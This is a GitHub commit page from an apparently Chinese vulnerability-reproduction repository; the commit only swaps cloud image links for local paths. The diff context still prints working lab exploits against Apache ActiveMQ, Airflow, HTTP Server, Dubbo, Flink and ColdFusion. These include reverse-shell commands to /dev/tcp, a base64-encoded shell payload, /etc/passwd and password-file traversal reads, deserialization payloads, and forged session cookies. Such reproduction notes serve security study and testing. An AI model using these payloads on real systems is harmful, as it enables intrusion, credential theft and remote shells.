Skip to content

Commit

Permalink
图片本地化
Browse files Browse the repository at this point in the history
  • Loading branch information
@Threekiii
Threekiii committed Dec 5, 2022
1 parent aba6db6 commit aca05e9
Show file tree
Hide file tree
Showing 724 changed files with 548 additions and 548 deletions.
6 changes: 3 additions & 3 deletions Adobe ColdFusion 反序列化漏洞 CVE-2017-3066.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -56,12 +56,12 @@ Content-Length: 2853

------

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212052978.png)
![](./images/202202212052978.png)

进入容器中,发现`/tmp/success`已成功创建:

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212053950.png)
![](./images/202202212053950.png)

将POC改成[反弹命令](https://www.bugku.net/runtime-exec-payloads/),成功拿到shell:

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212053074.png)
![](./images/202202212053074.png)
4 changes: 2 additions & 2 deletions Adobe ColdFusion 文件读取漏洞 CVE-2010-2861.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,11 +20,11 @@ docker-compose up -d

直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`

![image-20220221201331662](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212013778.png)
![image-20220221201331662](./images/202202212013778.png)

读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`

![image-20220221201418990](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212014074.png)
![image-20220221201418990](./images/202202212014074.png)



10 changes: 5 additions & 5 deletions Apache APISIX Dashboard API权限绕过导致RCE CVE-2021-45232.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,13 +19,13 @@ docker-compose up -d

然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。

![image-20221011092319611](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210110923738.png)
![image-20221011092319611](./images/202210110923738.png)

## 漏洞复现

利用`/apisix/admin/migrate/export``/apisix/admin/migrate/import`两个Apache APISIX Dashboard提供的未授权API,我们可以简单地导入一个恶意配置文件,其中包含我们构造的LUA脚本:

![image-20221011092714922](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210110927989.png)
![image-20221011092714922](./images/202210110927989.png)

注意的是,这个配置文件的最后4个字符是当前文件的CRC校验码,所以最好通过自动化工具来生成和发送这个利用数据包,比如[这个POC](https://github.com/wuppp/cve-2021-45232-exp)

Expand Down Expand Up @@ -127,7 +127,7 @@ if __name__ == "__main__":
print("attack error")
```

![image-20221011105801642](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111058704.png)
![image-20221011105801642](./images/202210111058704.png)

添加完恶意路由后,你需要访问Apache APISIX中对应的路径来触发前面添加的脚本。值得注意的是,Apache APISIX和Apache APISIX Dashboard是两个不同的服务,Apache APISIX Dashboard只是一个管理页面,而添加的路由是位于Apache APISIX中,所以需要找到Apache APISIX监听的端口或域名。

Expand All @@ -145,15 +145,15 @@ CMD: id
Cache-Control: max-age=0
```

![image-20221011105909716](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111059770.png)
![image-20221011105909716](./images/202210111059770.png)

也可以通过之前的POC实现命令执行:

```
curl http://your-ip:9080/LQsRF0 -H "cmd: id"
```

![image-20221011105809504](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202210111058564.png)
![image-20221011105809504](./images/202210111058564.png)

可见,我们在Header中添加的`CMD`头中的命令已被执行。

Expand Down
4 changes: 2 additions & 2 deletions Apache APISIX 默认密钥漏洞 CVE-2020-13945.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,13 +48,13 @@ Content-Length: 406
}
```

![image-20220221205854745](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212058881.png)
![image-20220221205854745](./images/202202212058881.png)

然后,我们访问刚才添加的router,就可以通过cmd参数执行任意命令:

```
http://your-ip:9080/attack?cmd=id
```

![image-20220221205939127](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202212059179.png)
![image-20220221205939127](./images/202202212059179.png)

12 changes: 6 additions & 6 deletions Apache ActiveMQ 任意文件写入漏洞 CVE-2016-3088.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -52,7 +52,7 @@ docker-compose up -d

默认的ActiveMQ账号密码均为`admin`,首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`,查看ActiveMQ的绝对路径:

![image-20220221144006543](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211440648.png)
![image-20220221144006543](./images/202202211440648.png)

然后上传webshell:

Expand Down Expand Up @@ -81,7 +81,7 @@ Content-Length: 374

移动到web目录下的api文件夹(`/opt/activemq/webapps/api/s.jsp`)中。如果Burpsuite发包不成功,使用Firefox进行修改后发送。

![image-20220221161155286](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211611379.png)
![image-20220221161155286](./images/202202211611379.png)

```
MOVE /fileserver/1.txt HTTP/1.1
Expand All @@ -95,13 +95,13 @@ Connection: close

shell.jsp已经上传成功:

![image-20220221153448172](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211534227.png)
![image-20220221153448172](./images/202202211534227.png)



通过webshell执行命令

![image-20220221154607001](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211546071.png)
![image-20220221154607001](./images/202202211546071.png)

### crontab反弹shell

Expand Down Expand Up @@ -132,11 +132,11 @@ Connection: close
Content-Length: 0
```

![image-20220221161242402](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211612498.png)
![image-20220221161242402](./images/202202211612498.png)

如果上述两个请求都返回204了,说明写入成功。等待反弹shell:

![image-20220221161312608](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211613664.png)
![image-20220221161312608](./images/202202211613664.png)

这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。

Expand Down
18 changes: 9 additions & 9 deletions Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -51,11 +51,11 @@ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjd
sudo update-alternatives --config java
```

![image-20220221132209838](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324903.png)
![image-20220221132209838](./images/202202211324903.png)

再次查看java版本,切换成功

![image-20220221132246597](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324904.png)
![image-20220221132246597](./images/202202211324904.png)

## 漏洞复现

Expand All @@ -78,19 +78,19 @@ mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
```

![image-20220221133654012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345369.png)
![image-20220221133654012](./images/202202211345369.png)

访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列,ID为kali-38087-1645421794512-1:1:1:1:1

默认账号密码:admin/admin

![image-20220221133733242](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345370.png)
![image-20220221133733242](./images/202202211345370.png)

点击这个信息触发文件创建,成功执行命令 touch /tmp/awesome_poc

![image-20220221133952983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345371.png)
![image-20220221133952983](./images/202202211345371.png)

![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211324906.png)也可以创建一个反弹shell的payload
![2](./images/202202211324906.png)也可以创建一个反弹shell的payload

```shell
bash -i >& /dev/tcp/192.168.174.128/9999 0>&1 (base64编码)
Expand All @@ -102,13 +102,13 @@ bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{bas
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
```

![image-20220221134243490](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345372.png)
![image-20220221134243490](./images/202202211345372.png)

查看消息队列,ID为kali-38435-1645422155171-1:1:1:1:1

![image-20220221134313545](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345373.png)
![image-20220221134313545](./images/202202211345373.png)

监听9999端口,点击消息队列会触发命令执行,反弹Shell

![image-20220221134508900](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211345374.png)
![image-20220221134508900](./images/202202211345374.png)

4 changes: 2 additions & 2 deletions Apache Airflow Celery 消息中间件命令执行 CVE-2020-11981.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -42,13 +42,13 @@ docker-compose logs airflow-worker

可以看到如下信息:

![image-20220329100933012](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251947997.png)
![image-20220329100933012](./images/202204251947997.png)

```
docker-compose exec airflow-worker ls -l /tmp
```

可以看到成功创建了文件`airflow_celery_success`

![image-20220329101045692](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251947998.png)
![image-20220329101045692](./images/202204251947998.png)

10 changes: 5 additions & 5 deletions Apache Airflow 示例DAG中的命令注入 CVE-2020-11978.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -31,15 +31,15 @@ docker-compose up -d

访问`http://your-ip:8080/admin/airflow/login`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:

![image-20220329111338269](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948096.png)
![image-20220329111338269](./images/202204251948096.png)

再点击执行按钮,在Configuration JSON中输入:`{"message":"'\";touch /tmp/airflow_dag_success;#"}`,再点`Trigger`执行dag:

![image-20220329111358392](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948097.png)
![image-20220329111358392](./images/202204251948097.png)

等几秒可以看到执行成功:

![image-20220329111445804](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948098.png)
![image-20220329111445804](./images/202204251948098.png)

到CeleryWorker容器中进行查看:

Expand All @@ -49,7 +49,7 @@ docker-compose exec airflow-worker ls -l /tmp

可以看到`touch /tmp/airflow_dag_success`成功被执行:

![image-20220329111605593](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948099.png)
![image-20220329111605593](./images/202204251948099.png)

### 反弹shell

Expand All @@ -59,5 +59,5 @@ docker-compose exec airflow-worker ls -l /tmp
{"message":"'\";bash -i >& /dev/tcp/your-vps-ip/9999 0>&1;#"}
```

![image-20220329113423239](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948100.png)
![image-20220329113423239](./images/202204251948100.png)

8 changes: 4 additions & 4 deletions Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ docker-compose up -d
curl -v http://localhost:8080/admin/airflow/login
```

![image-20220329105609442](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948002.png)
![image-20220329105609442](./images/202204251948002.png)

然后,使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`

Expand All @@ -45,15 +45,15 @@ pip install flask-unsign[wordlist]
flask-unsign -u -c [session from Cookie]
```

![image-20220329105921359](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948003.png)
![image-20220329105921359](./images/202204251948003.png)

Bingo,成功爆破出Key是`temporary_key`。使用这个key生成一个新的session,其中伪造`user_id`为1:

```
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```

![image-20220329110052524](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948004.png)
![image-20220329110052524](./images/202204251948004.png)

新生成的session为:

Expand All @@ -63,7 +63,7 @@ eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlLCJ1c2VyX2lkIjoiMSJ9.YkJ2WQ.sUbyyQy7

在浏览器中使用这个新生成的session,可见已成功登录:

![image-20220329110946880](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202204251948005.png)
![image-20220329110946880](./images/202204251948005.png)

可以使用Chrome插件[EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=zh)对Cookie进行修改。

8 changes: 4 additions & 4 deletions Apache Dubbo Java反序列化漏洞 CVE-2019-17564.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -51,7 +51,7 @@ $ ./zkCli -server target-ip:2181

连接后进入一个交互式控制台,使用`ls`即可列出其中所有节点,包括Dubbo相关的配置:

![image-20220222214720363](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222147467.png)
![image-20220222214720363](./images/202202222147467.png)

获取到RPC接口名为`org.vulhub.api.CalcService`。直接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到`http://your-ip:8080/org.vulhub.api.CalcService`即可触发反序列化漏洞:

Expand All @@ -61,11 +61,11 @@ $ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "touch /tmp/awe
$ curl -XPOST --data-binary @1.poc http://192.168.174.128:8080/org.vulhub.api.CalcService
```

![image-20220222220814317](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222208473.png)
![image-20220222220814317](./images/202202222208473.png)

进入docker,命令`touch /tmp/awesome_poc`执行成功:

![image-20220222220908304](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222209355.png)
![image-20220222220908304](./images/202202222209355.png)

反弹shell:

Expand All @@ -81,4 +81,4 @@ $ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,
$ curl -XPOST --data-binary @shell.poc http://192.168.174.128:8080/org.vulhub.api.CalcService
```

![image-20220222221020948](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202222210040.png)
![image-20220222221020948](./images/202202222210040.png)
4 changes: 2 additions & 2 deletions Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -59,9 +59,9 @@ success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
```

![image-20220223163924462](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231639569.png)
![image-20220223163924462](./images/202202231639569.png)

查看docker,`/tmp/awesome_poc`成功创建。

![image-20220223164054096](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231640168.png)
![image-20220223164054096](./images/202202231640168.png)

6 changes: 3 additions & 3 deletions Apache Flink 目录遍历漏洞 CVE-2020-17519.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,7 @@ docker-compose up -d

Apache Flink 启动后,访问`http://your-ip:8081`查看主页。

![image-20220223182227651](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231822762.png)
![image-20220223182227651](./images/202202231822762.png)

## 漏洞复现

Expand All @@ -47,7 +47,7 @@ Apache Flink 启动后,访问`http://your-ip:8081`查看主页。
http://xxx.xxx.xxx.xxx/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

![image-20220223182245983](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202231822055.png)
![image-20220223182245983](./images/202202231822055.png)

## 漏洞POC

Expand Down Expand Up @@ -118,5 +118,5 @@ if __name__ == '__main__':
POC_2(target_url, file_name)
```

![image-20220211111729412](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202111117492.png)
![image-20220211111729412](./images/202202111117492.png)

6 changes: 3 additions & 3 deletions Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞 CVE-2021-40438.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ docker-compose up -d

访问http://192.168.174.128:8080/

![image-20220221182309270](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211823401.png)
![image-20220221182309270](./images/202202211823401.png)



Expand All @@ -45,11 +45,11 @@ Connection: close

数据包Response为302跳转

![image-20220221182519441](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211825565.png)
![image-20220221182519441](./images/202202211825565.png)

浏览器显示跳转到http://www.baidu.com/页面

![image-20220221182434435](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211824537.png)
![image-20220221182434435](./images/202202211824537.png)



6 changes: 3 additions & 3 deletions Apache HTTP Server 2.4.49 路径穿越漏洞 CVE-2021-41773.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,15 +39,15 @@ curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/pas
可见,成功读取到`/etc/passwd`

![image-20220221183038882](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211830137.png)
![image-20220221183038882](./images/202202211830137.png)

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

```
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
```

![image-20220221183147331](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211831505.png)
![image-20220221183147331](./images/202202211831505.png)

写入反弹shell

Expand All @@ -61,5 +61,5 @@ curl -v --data "echo;echo 'bash -i >& /dev/tcp/192.168.174.128/9999 0>&1'>> /tmp
curl -v --data "echo;bash /tmp/shell.sh" 'http://192.168.174.128:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
```

![image-20220221184049972](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202211840056.png)
![image-20220221184049972](./images/202202211840056.png)

Loading

0 comments on commit aca05e9

Please sign in to comment.